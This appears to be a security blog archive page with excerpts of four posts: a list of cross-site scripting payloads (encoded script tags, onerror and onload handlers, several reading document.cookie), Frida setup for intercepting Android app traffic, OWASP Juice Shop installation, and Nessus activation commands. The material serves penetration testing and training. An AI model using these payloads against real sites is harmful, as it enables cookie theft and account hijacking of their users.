Posts

Showing posts from July, 2019

Useful Payloads-1

Image
%uff1cscript%uff1ealert(222)%uff1c/script%uff1e "><img src=x onerror=alert(document.cookie)> "><script>alert(222)</script> test</script><img src=1 onerror=alert(document.domain)> %uff1cimg src=a onerror=alert("XSS")%uff1e &qout;&lt;svg/onload=alert(1)&gt; <iframe src="javascript:alert(`xss`)"> %3cscript%3ealert(1)%3c%2fscript%3e <script>alert(document.cookie)</script> <script>alert(Date())</script> <svg/onload=confirm()> </script><script >alert(document.cookie)</script> <img src=asdf onerror=alert(document.cookie)> <BODY ONLOAD=alert(’XSS’)> </TITLE><SCRIPT>alert("XSS");</SCRIPT> <img src=”1″ onerror=”alert(1)” /> +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- <img src=”1″ onnerror=”alert(1)”> %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0...

Frida Android-

Image
Frida Android- +++++++++++++++++++++++++++ 1 – Installation of frida Install pip and python3 install frida then--> cd /data/local/tmp adb push cert-der.cer  /data/local/tmp adb shell mv cert-der.cer cert-der.crt (cert-der.cer) -->this is burp certificate or- You can just use the command line to unzip it: #unzip it unxz frida-server-15.1.14-android-x86.xz And then the following steps would be: #change the name mv frida-server-15.1.14-android-x86.xz frida-server #push to device adb push frida-server /data/local/tmp #change permissions adb shell "chmod 755 /data/local/tmp/frida-server" #Run frida-server adb shell "/data/local/tmp/frida-server 2-Download frida-server (for the target) and Setup frida-server on the phone- Depending on android download the frida-server (in my case it frida-server-12.6.9-android-x86) Next--> adb push frida-server-12.6.9-android-x86 /data/local/tmp/frida-server chmod 777 frida-server ./frida-server & 3-Inj...

OWASP Juice-Shop-

OWASP Juice-Shop- -From Sources GitHub repo size -Install node.js -Run git clone https://github.com/bkimminich/juice-shop.git (or clone your own fork of the repository) -Go into the cloned folder with cd juice-shop -Run npm install (only has to be done before first start or when you change the source code) -Run npm start -Browse to http://localhost:3000

Nessus Offline Activation

If you can't access GUI or it doesn't work please re-register via command prompt logged in as admin using these commands- 1. cd c:\program files\tenable\nessus 2. net stop "Tenable Nessus" 3. C:\Program Files\Tenable\Nessus\nessuscli fix --reset then press--> y 4. C:\Program Files\Tenable\Nessus\nessuscli fetch --register <ACTIVATION CODE> 5. C:\Program Files\Tenable\Nessus\nessuscli update --all 6. C:\Program Files\Tenable\Nessus\nessusd -R 7. net start "Tenable Nessus"